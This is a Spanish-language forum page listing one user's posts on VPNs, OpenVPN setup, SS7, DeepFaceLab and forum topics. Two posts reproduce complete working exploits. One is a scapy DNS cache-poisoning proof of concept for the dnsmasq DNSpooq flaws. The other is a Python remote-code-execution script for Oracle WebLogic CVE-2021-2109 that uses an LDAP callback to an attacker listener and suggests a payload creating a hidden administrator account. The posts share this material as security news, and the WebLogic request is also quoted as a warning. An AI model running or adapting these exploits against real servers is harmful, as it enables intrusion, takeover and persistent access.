Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

#821
Software / Re: VPN
26 Enero 2021, 00:04 AM
josianne supongo que usabas un complemento para Firefox

¿Cuál era por curiosidad? como comenta @XSStringManolo, por desgracia, se han dado varios casos.

CitarPasa con todos los VPN y proxy.

hombre pero no seas así @XSStringManolo  xD

No todos las VPN's gratuitas son inseguras jeje aunque supongo que muchas logean...

ProtonVPN de los creadores de ProtonMail

NordVPN
https://addons.mozilla.org/es/firefox/addon/nordvpn-proxy-extension/


Don't use VPN services.
https://gist.github.com/joepie91/5a9909939e6ce7d09e29

CitarVPNs don't provide security. They are just a glorified proxy.
:laugh:
#822
Hacking / Re: Hacer ataque DDoS a un amigo
25 Enero 2021, 23:42 PM
si tu conexión a internet es capaz de generar y manejar más ppps (paquetes por segundo) en teoría si que sería posible "tirar la conexión de tu amigo", ya que si su router o módem no es capaz de absorver el tráfico se podría bloquear o no responder (o perder paquetes) si generas mucho tráfico.

Pero recuerda DDoS  =/ no es hacking (como diría ANELKAOS xD)
#823
Muchos modelos de routers Asus ya llevan incorporado OpenVPN, sólo hay que hacer pequeñas configuraciones para que funcione.

¿Cómo configuro el servidor OpenVPN en RT-AC68U -ASUSWRT?
https://www.asus.com/es/support/FAQ/1008713/

Aunque la documentación oficial deja mucho que desear...

OpenVPN no sólo es un "protocolo", es un sofware cliente/servidor que se ha convertido casi en un estandar para VPN's.

La VPN es totalmente transparente, es igual que estén países diferentes, nadie lo sabrá. Cuando te conectes con cliente B a la VPN en A, será como si estuvieras en A. Si las dos conexiones son medianamente rápidas no tendrás problemas, lo máximo un poco de retraso de velocidad. Dependerá más de las interconexiones entre los dos proveedores de internet, cosa que tu poco podrás hacer para mejorar.

Por ejemplo en China utilizan mucho el servicio de VPN's que ya de otra manera no podrían entrar ni en Google, ni en Facebook, ni en muchos otros sitios que están directamente censurados......
#824
opino lo mismo que [D]aniel.

Aunque teóricamente no sea legal, creo que a estas alturas poner un "disco de inicio de Windows 95, Windows 98 y/o Windows ME" no creo que haya mucho problemas "legales":

Se entiende que es por motivos recreacionales y/o educativos.
#825
Seguridad / Re: Firewall SS7 y Diameter
25 Enero 2021, 22:58 PM
SS7 es un protocolo de señales telefónicas. Y diameter más de lo mismo

Porque no explicas un poco mejor para que quieres obtener esa información. El propósito de la pregunta es ¿Para proteger una empresa? ¿Por curiosidad? ¿Para hace un trabajo?
#826
PoC para DNSpooq - dnsmasq cache poisoning CVE-2020-25686 - CVE-2020-25684 - CVE-2020-25685 por Teppei Fukuda @knqyf263

For educational purposes only

https://github.com/knqyf263/dnspooq

$ docker-compose exec attacker bash
bash-5.0# python exploit.py




exploit.py

Código (python) [Seleccionar]
#!/usr/bin/python

import itertools
from scapy.all import *


def patch(dns_frame: bytearray, pseudo_hdr: bytes, dns_id: int, dport: int):
    # set dport
    dns_frame[36] = (dport >> 8) & 0xFF
    dns_frame[37] = dport & 0xFF

    # set dns_id
    dns_frame[42] = (dns_id >> 8) & 0xFF
    dns_frame[43] = dns_id & 0xFF

    # reset checksum
    dns_frame[40] = 0x00
    dns_frame[41] = 0x00

    # calc new checksum
    ck = checksum(pseudo_hdr + dns_frame[34:])
    if ck == 0:
        ck = 0xFFFF
    cs = struct.pack("!H", ck)
    dns_frame[40] = cs[0]
    dns_frame[41] = cs[1]


ftabsiz = 150
qname = "example.com"
target = "google.com"
poison = "169.254.169.254"

attacker = "10.10.0.3"
forwarder = "10.10.0.2"
cache = "10.10.0.4"

txids = range(1, 2**16)
sports = range(1025, 2**16)
candidates = itertools.product(txids, sports)

# DNS query
qd = DNSQR(qname=qname, qtype="A", qclass='IN')
req = IP(dst=forwarder) / UDP(dport=53) / DNS(id=0, rd=1, qd=qd)
dns_layer = req[DNS]

# Socket
s2 = conf.L2socket(iface="eth0")
s3 = conf.L3socket(iface="eth0")

print("Querying non-cached names...")
for i in range(ftabsiz):
    dns_layer.id = i
    s3.send(req)

print("Generating spoofed packets...")
res = Ether() / \
      IP(src=cache, dst=forwarder) / \
      UDP(sport=53, dport=0) / \
      DNS(id=0, qr=1, ra=1, qd=qd,
          an=DNSRR(rrname=qname, ttl=900, rdata=target, type="CNAME", rclass="IN") /
             DNSRR(rrname=target, ttl=900, rdata=poison, type="A", rclass="IN"))

# Optimization
dns_frame = bytearray(raw(res))
pseudo_hdr = struct.pack(
    "!4s4sHH",
    inet_pton(socket.AF_INET, res["IP"].src),
    inet_pton(socket.AF_INET, res["IP"].dst),
    socket.IPPROTO_UDP,
    len(dns_frame[34:]),
)

verify = IP(dst=forwarder) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=target, qtype="A", qclass='IN'))

start_time = time.time()

n_pkts = 0
for txid, sport in candidates:
    # Update TXID and UDP dst port
    patch(dns_frame, pseudo_hdr, txid, sport)
    s2.send(dns_frame)

    n_pkts += 1
    if sport == 65535:
        res = sr1(verify, verbose=0, iface="eth0", timeout=0.01)
        if res is not None and res.haslayer(DNSRR):
            print(f"Poisoned: {res[DNSRR].rrname} => {res[DNSRR].rdata}")
            break

end_time = time.time()
print(f"sent {n_pkts} responses in {end_time - start_time:.3f} seconds")

#827
- Exploit en (python3) JndiBinding  por Photubias


Código (python) [Seleccionar]
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''   
  Copyright 2021 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
       
        File name CVE-2021-2109.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
       
        Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
         from https://github.com/welk1n/JNDI-Injection-Exploit
         to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None

## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''): self.stderr += line
       

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
    print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args: sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
        if sHost[-1:] == '/': sHost = sHost[:-1]
        if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '':
        exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        ' in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
        )

    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)
   
    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
   
    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Succesfully logged in!\n')
    else: exit('[-] Authentication Denied')
   
    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ##  http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()


Cuidado peticiones tipo:

GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/hacked;AdminServer-)

Ya están saliendo varias reglas para WAF.
#828
El secuestro ciego de TCP / IP sigue vivo en Windows 7... y no solo. Esta versión de Windows es sin duda uno de los objetivos más "jugosos" a pesar de que el 14 de enero de 2020 fue el EOL (fin de vida útil) oficial para ella. Según varios datos, Windows 7 tiene alrededor del 25% del mercado de sistemas operativos (SO) y sigue siendo el segundo sistema operativo de escritorio más popular del mundo.

Sólo funciona con protocolos ampliamente implementados que no cifran el tráfico, por ejemplo, FTP, SMTP, HTTP, DNS, IMAP

¿Dónde está el error?

En la implementación de la pila TCP / IP para Windows 7, IP_ID es un contador global.

Tool - PoC
http://site.pi3.com.pl/exp/devil_pi3.c

Fuente:
http://blog.pi3.com.pl/?p=850
#829
Software / Re: Donde descargar Deepfacelab?
22 Enero 2021, 18:58 PM
CitarBuenas, he seguido el hilo de respuestas y después de descargar de la pagina de iperov no encuentro como instalar el programa , busco un .exe para poder ejecutarlo pero igual no va así , ¿como lo instalasteis? donde puedo encontrar info en español?

Es un repositorio de github del usuario iperov

https://github.com/iperov/DeepFaceLab

Donde pone
Releases
tienes el ".exe" para Windows
Windows (magnet link)    Last release. Use torrent client to download.
https://tinyurl.com/y8lntghz
Windows (Mega.nz)    Contains new and prev releases.
https://mega.nz/folder/Po0nGQrA#dbbttiNWojCt8jzD4xYaPw

En Links tienes guías y tutoriales en inglés. En Español poca información debe haber.

Como ya dije no es un software precisamente fácil de usar..... y no refería a la potencia del ordenador o de la gráfica.

En el último deepfake que he visto en la TV (un anuncio de TV en España) pues explican como lo han hecho:

https://www.xataka.com/robotica-e-ia/hablan-creadores-deepfake-lola-flores-pese-a-usar-inteligencia-artificial-fue-proceso-bastante-artesanal

[youtube=640,360]https://youtu.be/BQLTRMYHwvE[/youtube]

Si, han usado FaceSwap y DeepFaceLab

Pero si lo lees, verás que para que quede bien se necesitan muchas horas de trabajo.... y muchas imágenes.
#830
Sugerencias y dudas sobre el Foro / Re: Avatar
22 Enero 2021, 18:53 PM
opino lo mismo que #!drvy

Los Tercios de Aguilar "no suenan al franquismo" (.......), pero siendo de la Falange, pues de ideología "fascista", un rato largo....

No te preocupes #!drvy , siempre que veo las elecciones las papeletas de la Falange Española en Barcelona, están hasta arriba, no deben tener muchos votos.